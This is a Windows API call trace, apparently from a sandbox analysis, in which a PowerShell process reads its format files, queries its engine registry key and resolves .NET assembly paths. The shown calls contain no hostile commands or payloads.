	[0296.370] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12ce80 | out: lpFileInformation=0x12ce80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0296.370] SetErrorMode (uMode=0x1) returned 0x1
	[0296.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0296.371] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12cf68 | out: phkResult=0x12cf68*=0x330) returned 0x0
	[0296.371] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12ceec, lpData=0x0, lpcbData=0x12cee8*=0x0 | out: lpType=0x12ceec*=0x1, lpData=0x0, lpcbData=0x12cee8*=0x56) returned 0x0
	[0296.371] CoTaskMemAlloc (cb=0x5a) returned 0x3a4f30
	[0296.371] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cebc, lpData=0x3a4f30, lpcbData=0x12ceb8*=0x56 | out: lpType=0x12cebc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12ceb8*=0x56) returned 0x0
	[0296.371] CoTaskMemFree (pv=0x3a4f30) 
	[0296.371] RegCloseKey (hKey=0x330) returned 0x0
	[0296.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0296.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0296.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x12c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0296.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0296.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x12c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0296.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0296.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0296.392] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x12c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0296.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x12c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0296.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0296.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x12c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0296.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12c3f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0297.107] VirtualQuery (in: lpAddress=0x12ba00, lpBuffer=0x12c8c0, dwLength=0x30 | out: lpBuffer=0x12c8c0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.107] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x877d1177, Data2=0x8d24, Data3=0x4faa, Data4=([0]=0xac, [1]=0x1b, [2]=0xab, [3]=0x77, [4]=0xd5, [5]=0x6d, [6]=0x3, [7]=0xab))) returned 0x0
	[0297.107] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x9426711e, Data2=0x6548, Data3=0x464e, Data4=([0]=0xb1, [1]=0xc4, [2]=0x27, [3]=0xd9, [4]=0xca, [5]=0xa5, [6]=0x94, [7]=0xef))) returned 0x0
	[0297.107] VirtualQuery (in: lpAddress=0x12bbb0, lpBuffer=0x12ca70, dwLength=0x30 | out: lpBuffer=0x12ca70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.108] VirtualQuery (in: lpAddress=0x12bbb0, lpBuffer=0x12ca70, dwLength=0x30 | out: lpBuffer=0x12ca70*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.108] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x37d6b7f9, Data2=0x4b98, Data3=0x48aa, Data4=([0]=0xa1, [1]=0x2c, [2]=0x5, [3]=0x8, [4]=0x90, [5]=0x41, [6]=0x49, [7]=0x9b))) returned 0x0
	[0297.108] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x5d13a9e9, Data2=0x9200, Data3=0x4aba, Data4=([0]=0x9b, [1]=0xd8, [2]=0xc9, [3]=0xcc, [4]=0x32, [5]=0x97, [6]=0xf3, [7]=0xba))) returned 0x0
	[0297.108] VirtualQuery (in: lpAddress=0x12be00, lpBuffer=0x12ccc0, dwLength=0x30 | out: lpBuffer=0x12ccc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.109] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.109] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.109] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x217cd048, Data2=0x9c0c, Data3=0x48c2, Data4=([0]=0x9c, [1]=0x64, [2]=0xf7, [3]=0xc0, [4]=0xcf, [5]=0x24, [6]=0xe9, [7]=0xed))) returned 0x0
	[0297.109] VirtualQuery (in: lpAddress=0x12be00, lpBuffer=0x12ccc0, dwLength=0x30 | out: lpBuffer=0x12ccc0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.109] VirtualQuery (in: lpAddress=0x12bc20, lpBuffer=0x12cae0, dwLength=0x30 | out: lpBuffer=0x12cae0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.110] VirtualQuery (in: lpAddress=0x12b470, lpBuffer=0x12c330, dwLength=0x30 | out: lpBuffer=0x12c330*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.110] VirtualQuery (in: lpAddress=0x12b470, lpBuffer=0x12c330, dwLength=0x30 | out: lpBuffer=0x12c330*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.110] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x9b48ffc4, Data2=0x1471, Data3=0x4ba8, Data4=([0]=0xa3, [1]=0x66, [2]=0xdf, [3]=0x69, [4]=0xa5, [5]=0x89, [6]=0xf6, [7]=0xda))) returned 0x0
	[0297.110] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x85925dfa, Data2=0x4154, Data3=0x4784, Data4=([0]=0xb1, [1]=0x5e, [2]=0x87, [3]=0xc4, [4]=0xa0, [5]=0xd4, [6]=0x29, [7]=0x46))) returned 0x0
	[0297.110] SetErrorMode (uMode=0x1) returned 0x1
	[0297.110] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0297.111] GetFileType (hFile=0x330) returned 0x1
	[0297.111] SetErrorMode (uMode=0x1) returned 0x1
	[0297.111] GetFileType (hFile=0x330) returned 0x1
	[0297.111] ReadFile (in: hFile=0x330, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.112] ReadFile (in: hFile=0x330, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.112] ReadFile (in: hFile=0x330, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.113] ReadFile (in: hFile=0x330, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.113] ReadFile (in: hFile=0x330, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.114] ReadFile (in: hFile=0x330, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.114] ReadFile (in: hFile=0x330, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.114] ReadFile (in: hFile=0x330, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.115] ReadFile (in: hFile=0x330, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.115] ReadFile (in: hFile=0x330, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.115] ReadFile (in: hFile=0x330, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.116] ReadFile (in: hFile=0x330, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.116] ReadFile (in: hFile=0x330, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.116] ReadFile (in: hFile=0x330, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.116] ReadFile (in: hFile=0x330, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.117] ReadFile (in: hFile=0x330, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.118] ReadFile (in: hFile=0x330, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0297.118] ReadFile (in: hFile=0x330, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x12ced8*=0xbce, lpOverlapped=0x0) returned 1
	[0297.119] ReadFile (in: hFile=0x330, lpBuffer=0x33f58ae, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x33f58ae*, lpNumberOfBytesRead=0x12ced8*=0x0, lpOverlapped=0x0) returned 1
	[0297.119] ReadFile (in: hFile=0x330, lpBuffer=0x33f6178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x33f6178*, lpNumberOfBytesRead=0x12ced8*=0x0, lpOverlapped=0x0) returned 1
	[0297.119] SetErrorMode (uMode=0x1) returned 0x1
	[0297.119] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12ce80 | out: lpFileInformation=0x12ce80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0297.119] SetErrorMode (uMode=0x1) returned 0x1
	[0297.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0297.120] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12cf68 | out: phkResult=0x12cf68*=0x330) returned 0x0
	[0297.120] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12ceec, lpData=0x0, lpcbData=0x12cee8*=0x0 | out: lpType=0x12ceec*=0x1, lpData=0x0, lpcbData=0x12cee8*=0x56) returned 0x0
	[0297.120] CoTaskMemAlloc (cb=0x5a) returned 0x3a50f0
	[0297.120] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cebc, lpData=0x3a50f0, lpcbData=0x12ceb8*=0x56 | out: lpType=0x12cebc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12ceb8*=0x56) returned 0x0
	[0297.120] CoTaskMemFree (pv=0x3a50f0) 
	[0297.120] RegCloseKey (hKey=0x330) returned 0x0
	[0297.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0297.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0297.911] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x60ceddf2, Data2=0x72a3, Data3=0x4737, Data4=([0]=0xab, [1]=0x31, [2]=0xf9, [3]=0x13, [4]=0x29, [5]=0x17, [6]=0x5a, [7]=0xf2))) returned 0x0
	[0297.911] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xaa72927b, Data2=0xcb49, Data3=0x4f11, Data4=([0]=0x8c, [1]=0xe3, [2]=0xfa, [3]=0xa8, [4]=0x9a, [5]=0xa3, [6]=0x2, [7]=0x83))) returned 0x0
	[0297.911] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x5524c2f0, Data2=0x9812, Data3=0x4c06, Data4=([0]=0x9d, [1]=0xfc, [2]=0xe7, [3]=0x18, [4]=0x39, [5]=0xf7, [6]=0xb8, [7]=0xbd))) returned 0x0
	[0297.911] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xf7896990, Data2=0xca46, Data3=0x4df1, Data4=([0]=0xb3, [1]=0x77, [2]=0x38, [3]=0x6f, [4]=0xe2, [5]=0xf0, [6]=0x71, [7]=0x59))) returned 0x0
	[0297.911] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x429eeee5, Data2=0x8ec, Data3=0x40c0, Data4=([0]=0x8d, [1]=0xb6, [2]=0x9d, [3]=0x24, [4]=0x91, [5]=0x6b, [6]=0xe0, [7]=0x33))) returned 0x0
	[0297.912] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xaf91ecc, Data2=0x6c99, Data3=0x4210, Data4=([0]=0xa9, [1]=0xb8, [2]=0xf4, [3]=0x5, [4]=0xfb, [5]=0x5b, [6]=0x56, [7]=0x5a))) returned 0x0
	[0297.912] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0297.912] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xd36bcb8e, Data2=0xafe, Data3=0x480f, Data4=([0]=0xb2, [1]=0x25, [2]=0xe3, [3]=0x17, [4]=0x3a, [5]=0x35, [6]=0x8d, [7]=0xeb))) returned 0x0
	[0297.913] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0297.913] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0297.914] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xe0205913, Data2=0x2dec, Data3=0x4517, Data4=([0]=0xb4, [1]=0x24, [2]=0x8f, [3]=0xd7, [4]=0x5e, [5]=0xc9, [6]=0x6, [7]=0x29))) returned 0x0
	[0297.914] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xe6eb5745, Data2=0x34f8, Data3=0x45f9, Data4=([0]=0x8b, [1]=0xdc, [2]=0x29, [3]=0xc8, [4]=0x4b, [5]=0xe7, [6]=0xcf, [7]=0x31))) returned 0x0
	[0297.914] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x4bf7be6e, Data2=0xa315, Data3=0x41a2, Data4=([0]=0xb3, [1]=0xed, [2]=0x5, [3]=0xde, [4]=0x2, [5]=0xe1, [6]=0x15, [7]=0xea))) returned 0x0
	[0297.915] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xf0f26bfa, Data2=0x49a7, Data3=0x4829, Data4=([0]=0xaf, [1]=0x89, [2]=0x8, [3]=0xd8, [4]=0xb1, [5]=0xb, [6]=0x6c, [7]=0x2f))) returned 0x0
	[0297.915] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0297.915] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x410e0ab2, Data2=0x3192, Data3=0x4915, Data4=([0]=0xbd, [1]=0xaf, [2]=0x43, [3]=0x88, [4]=0x3f, [5]=0xc1, [6]=0x83, [7]=0x5b))) returned 0x0
	[0297.916] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0297.917] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.918] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.918] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.918] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.918] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x1f4a0a1d, Data2=0xb603, Data3=0x4b4e, Data4=([0]=0x93, [1]=0xf9, [2]=0x41, [3]=0xb5, [4]=0x50, [5]=0x4, [6]=0x74, [7]=0xdb))) returned 0x0
